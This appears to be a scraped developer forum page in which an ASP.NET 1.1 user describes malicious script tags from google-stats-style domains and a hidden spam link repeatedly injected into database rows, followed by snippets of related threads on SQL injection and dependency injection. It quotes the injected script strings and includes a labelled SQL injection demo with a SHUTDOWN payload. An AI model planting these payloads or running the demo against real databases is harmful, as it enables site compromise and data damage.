.NET Tutorials, Forums, Interview Questions And Answers
Welcome :Guest
Sign In
Win Surprise Gifts!!!

Top 5 Contributors of the Month
Gaurav Pal
Post New Web Links

What is this - XSS attack oe SQL Injection

Posted By:      Posted Date: September 29, 2010    Points: 0   Category :ASP.Net

Hi All,

I am struggling with the problem since the last week. The apllication is built upon the follwing technologies - ASP.NET 1.1, SQL SERVER 2005, extensive use of JavaScript.

I saw last week that an unknown script was aapended to one or more columns of every row in some sertain tables. I removed that script but it re-appeared once again. The script looks something like this (PLEASE DO NOT CLICK ON THIS LINK....I DON'T KNOW WHAT IT WILL DO)</title><script src="http://google-stats50 . info /ur. php>".

When the script reappeared, it may appear with different link (PLEASE DO NOT CLICK ON LINKS BELOW)

1) </title><script src="http:// google-stats49 . info /ur. php>"

2) </title><script src="http:// google-stats48 . info /ur. php>"

3) </title><script src="http:// google-stats47 . info /ur. php>"

4) </title><a style=display:none; href=http:// worid - of - books . com >book</a>

To prevent these scripts to re-appear, I took the following steps:

a) Encrypting the sensitive information in the Web.config file

b) Making the IFRAME element secure by applying the attribute security="restricted"

c) setti

View Complete Post

More Related Resource Links

On SQL Injection Attack Surprises

In a recent thread Erland Sommarskog has pointed out that even nchar(10) text input is big enough for an SQL injection attack. Demo follows: /************* WARNING **************** * THIS IS AN SQL INJECTION DEMO - DON'T RUN IT ON PRODUCTION * EXECUTE IT AT YOUR OWN RISK ***************************************/ USE tempdb; GO /**** DISCLAIMER - DEMO CODE ONLY - DON'T USE IT PRODUCTION ****/ CREATE PROC sprocSQLInjectionAttackDemo @input nchar(10) AS BEGIN DECLARE @SQL nvarchar(max) SET @SQL = ' SELECT Color FROM AdventureWorks2008.Production.Product'+CHAR(10)+ ' WHERE Color like '+@input PRINT @SQL EXEC (@SQL) END GO -- Test SQL injection stored procedure DECLARE @input nchar(10)= '''''SHUTDOWN' EXEC sprocSQLInjectionAttackDemo @input GO /* SELECT Color FROM AdventureWorks2008.Production.Product WHERE Color like ''SHUTDOWN (0 row(s) affected) The SHUTDOWN statement cannot be executed within a transaction or by a stored procedure. Msg 0, Level 11, State 0, Line 0 A severe error occurred on the current command. The results, if any, should be discarded. */ Do you have an SQL Injection surprise story/script? If script, just cripple it to make it harmless.   Kalman Toth, SQL Server & Business Intelligence Training; SQL 2008 GRAND SLAM

workaroud for HTML header injection attack in asp.net ?


Hai All,

on our site we are running the IBM APP SCAN Tool that tool is giving one problem that is HTML Header injection. so, how can we fix this problem. anybody faced this problem let me know.


Burepalli V  S Rao.

SQL Injection Walkthrough / Tutorial

SQL Injection is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

Test Run: Fault Injection Testing with TestApi


Fault injection testing is the process of deliberately inserting an error into an application to determine whether it deals with the error properly. We'll explain how you can introduce faults into .NET applications at run time using the Managed Code Fault Injection APIs of the TestApi library

James McCaffrey

MSDN Magazine August 2010

Inside Microsoft patterns & practices: Dependency Injection in Libraries


This article discusses how to write a library or framework that uses the Dependency Injection pattern and how the change in focus affects the usage of the pattern.

Chris Tavares

MSDN Magazine November 2009

PIAB And WCF: Integrating the Policy Injection Application Block with WCF Services


Using the PIAB you can enhance WCF services with policies such as validation, performance monitoring, authorization and caching without having to change a line of code.

Hugh Ang and David San Filippo

MSDN Magazine February 2008

Design Patterns: Dependency Injection


Today there is a greater focus than ever on reusing existing components and wiring together disparate components to form a cohesive architecture. But this wiring can quickly become a daunting task because as application size and complexity increase, so do dependencies.

Griffin Caprio

MSDN Magazine September 2005

Attack Surface: Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users


In this article, Microsoft security expert Michael Howard discusses the cardinal rules of attack surface reduction. His rules - reduce the amount of code executing by default, reduce the volume of code that is accessible to untrusted users by default, and limit the damage if the code is exploited - are explained along with the techniques to apply the rules to your code.

Michael Howard

MSDN Magazine November 2004

Data Security: Stop SQL Injection Attacks Before They Stop You


To execute a SQL injection attack, a hacker writes a Web page that captures text in a textbox to be used to execute a query against a database. The hacker enters a malformed SQL statement into the textbox that causes the back-end database to perform operations the owners did not intend it to perform, like making unauthorized updates. This article explains how you can protect against the all too common SQL injection attack in your own database. The steps covered include data validation, proper exception handing, and much more.

Paul Litwin

MSDN Magazine September 2004

sql Injection



In a Text field whatever I will enter after less than "<" symbol will disappear.

 So I am just replacing this symbol with a space, please let me know if there is any other desired output we need here.




UserControl, CustomControl Design Time Support errors IOC, Dependency Injection, MVP

  Hi, is there a way to completely disable design time support for CustomControl, and UserControl ? I have about 30 UserControls and 10 CustomControls in my WinForms app, which contains some Dependency Injections and IOC stuff in constructors and Load handlers. I have lots of large UserControls containing smaller UserControls (CompositeView). All my UI code is pretty dynamic and the only thing i need to do at design time is to drag&drop containers in other containers (UserControls). And now i have a hard time doing this, because i have to wrap all constructors and Load Handlers in CurrentProccess!="devenv"... and when I'm Implementing some new View interface (which consist lots of properties) in UserControl all those properties by default throw NotImplementedException and i don't always need to implement them immediately but still i need to be able to run this code for testing. Besides, then i have to clean up designer generated class because it adds unnecessary null value property initializations, and then it way add some other ____ code, and so on.... Imagine UserControl with 10-15 nested UserControls, and then i try to open it in Form Designer and get ObjectReference NULL exception (for IOC) or some NotSupported NotImplemented exceptions (for properties) without adequate CallStack available! There is a CallStack but there is no trace in it to my Code (

Injection attacks

How do we protect our site fomr SQL Injection attacks, among other security  practices?

How to use injection for workflows

I want to inject some instances and values into a workflow using Unity. It seems that the only way to do this is to define InArgument properties on the workflow and assign values to those arguments on the workflow instance prior to running the workflow. For example: <Activity mc:Ignorable="sap" x:Class="WorkflowConsoleApplication1.Workflow1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="clr-namespace:Microsoft.VisualBasic;assembly=System" xmlns:mva="clr-namespace:Microsoft.VisualBasic.Activities;assembly=System.Activities" xmlns:s="clr-namespace:System;assembly=mscorlib" xmlns:s1="clr-namespace:System;assembly=System" xmlns:s2="clr-namespace:System;assembly=System.Xml" xmlns:s3="clr-namespace:System;assembly=System.Core" xmlns:s4="clr-namespace:System;assembly=System.ServiceModel" xmlns:sa="clr-namespace:System.Activities;assembly=System.Activities" xmlns:sad="clr-namespace:System.Activities.Debugger;assembly=System.Activities" xmlns:sap="http://schemas.microsoft.com/netfx/2009/xaml/activities/presentation" xmlns:scg="clr-namespace:System.Collections.Generic;assembly=System" xmlns:scg1="clr-namespace:System.Collections.Gene

create a sql server 2005 new login for SQL Injection prevention

    Hi All,  Thank you for advance. Our database affected with SQL Injection. so We need to create a sql server 2005 new login for SQL Injection prevention User can perform, access tables with select,update and delete queryaccess views, functions and stored procperform cursor     what are the permissions given for that login account?

ASP.NET MVC 3 P1 Filter Injection

Hello!I've read through Brad Wilson's article series "ASP.NET MVC 3 Service Location" (http://bradwilson.typepad.com/blog/2010/07/service-location-pt4-filters.html) and tried to get filter injection work with Unity without success (Stack Trace: http://www.aspkoll.se/code/Index.asp?id=625).Feels like I have searched for all relevant keywords I can think of but have not found any other article that takes up the subject so the question is, how do I solve it with the filter injection? Can also add that the code is exactly the same as Brad Wilson's and I use the newest version of Unity.Thanks,Timmie

Custom Authenticate Attribute with Constructor (Dependency) Injection

  I have a [BeastAuthenticate] attribute on my controller.  The following code works fine but I would like to use Contructor (Dependency) Injection with Unity.  The problem is that the attribute will run the contructor with no parameters.  Interfaces ITMSLogger and IADGroups are setup to use Dependency Injection with TMSLogger and ADGroups respectively.   The following code works fine but doesn't use dependency injection for class ADGroups. public class BeastAuthenticateAttribute : AuthorizeAttribute { private ITMSLogger logger = new TMSLogger(); public BeastAuthenticateAttribute() { ADGroups adGroups = new ADGroups(logger); Roles = adGroups.GetRolesWithGroup("BEAST"); } } I tried the following but I'm getting an error ("Object reference is required...") with "this (adGroups). public class BeastAuthenticateAttribute : AuthorizeAttribute { private ITMSLogger logger = new TMSLogger(); private IADGroups adGroups;// = new ADGroups(new TMSLogger()); public BeastAuthenticateAttribute() : this (adGroups) { // adGroups = new ADGroups(logger); // this(adGroups); } public BeastAuthenticateAttribute(IADGroups adGroups) { //ADGroups adGroups = new ADGroups(l

Prevent SQL Injection when using values from a ListBox in the query

Hello,I'm using a List Box to get multiple values that will be used in a query.I can loop over the List Box and create the string.i.e. 'blue','red','purple'The string is used in the query: SELECT * FROM TABLE1 WHERE COLOR IN('blue','red','purple'). Is there a way to parametrize multiple values? @COLOR='blue','red','purple'What will be the best practice to prevent SQL injections in this scenario?
ASP.NetWindows Application  .NET Framework  C#  VB.Net  ADO.Net  
Sql Server  SharePoint  Silverlight  Others  All   

Hall of Fame    Twitter   Terms of Service    Privacy Policy    Contact Us    Archives   Tell A Friend